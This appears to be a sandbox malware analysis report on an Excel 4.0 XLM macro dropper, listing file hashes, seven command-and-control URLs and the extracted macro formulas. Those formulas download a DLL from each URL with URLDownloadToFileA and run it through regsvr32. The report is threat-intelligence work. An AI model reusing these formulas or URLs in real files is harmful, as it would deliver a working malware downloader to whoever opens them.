General

  • Target: 1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498
  • Size: 20KB
  • Sample: 241120-fneptascql
  • MD5: 4ed529f7ab78c5ab0325baefb7fd147c
  • SHA1: b4ca75333b89b30e453a3967bcb44b09040ebc3c
  • SHA256: 1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498
  • SHA512: b5c3e6c63f41b6cb1cece90c55fc6c4e5c4c81f842c78fe7b78a4487306109d0b6e5f99a76826dabb90d59395cbf50d86ab099afee6c907b628c0df699a77733
  • SSDEEP: 384:6/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:6tINAo4FLkCBn9kC+xbLzJy

Score
10/10

Malware Config

  • Extracted
    Rule: Excel 4.0 XLM Macro
    C2:
      http://antaoco.com/wp-admin/5WaIjOuHnUj/
      http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
      http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
      http://andrewpharma.com/wp-includes/WqgKtKrYJM/
      http://amkltd.co.uk/amk/IPuhx/
      http://gees.com.pl/geessw/2YmxITo6/
      http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/

Attributes
  • formulas

      =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://antaoco.com/wp-admin/5WaIjOuHnUj/","..\kytk.dll",0,0)
      =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/WqgKtKrYJM/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amkltd.co.uk/amk/IPuhx/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gees.com.pl/geessw/2YmxITo6/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D26<0,CLOSE(0),)
      =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
      =RETURN()

Extracted

  Language: xlm4.0
  Source: xlm40.dropper
  URLs:
    http://antaoco.com/wp-admin/5WaIjOuHnUj/
    http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
    http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
    http://andrewpharma.com/wp-includes/WqgKtKrYJM/
    http://amkltd.co.uk/amk/IPuhx/
    http://gees.com.pl/geessw/2YmxITo6/
    http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/

Targets

    • Target: 1d3cdf703fa3d5fb83f70a69ae913ddcda0d7f1d4a26cd4ac8203a9f19e05498
    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15